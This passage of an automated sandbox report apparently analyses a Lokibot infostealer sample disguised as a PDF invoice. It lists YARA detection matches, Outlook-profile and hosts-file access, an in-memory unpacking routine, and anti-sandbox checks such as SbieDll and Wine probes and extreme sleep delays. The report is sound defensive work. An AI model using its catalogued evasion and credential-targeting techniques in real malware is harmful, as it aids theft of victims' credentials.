              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040549C
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_004029D4
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: String function: 00405B6F appears 42 times
              Source: PI_Nov9071011998_ENTRUSTpdf.exeBinary or memory string: OriginalFilename vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.241253841.0000000008720000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.234566938.0000000000C12000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTM.exe8 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exeBinary or memory string: OriginalFilename vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.500459878.0000000000A62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTM.exe8 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exeBinary or memory string: OriginalFilenameTM.exe8 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@302/2
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI_Nov9071011998_ENTRUSTpdf.exe.logJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: PI_Nov9071011998_ENTRUSTpdf.exeVirustotal: Detection: 20%
              Source: unknownProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe 'C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe {path}
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe {path}
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.PI_Nov9071011998_ENTRUSTpdf.exe.c10000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PI_Nov9071011998_ENTRUSTpdf.exe.c10000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 1.0.PI_Nov9071011998_ENTRUSTpdf.exe.a60000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.a60000.1.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572, type: MEMORY
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_00C16283 push cs; retf
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00A66283 push cs; retf
              Source: initial sampleStatic PE information: section name: .text entropy: 7.69094003544
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeWindow / User API: threadDelayed 954
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 5464Thread sleep time: -1844674407370954s >= -30000s
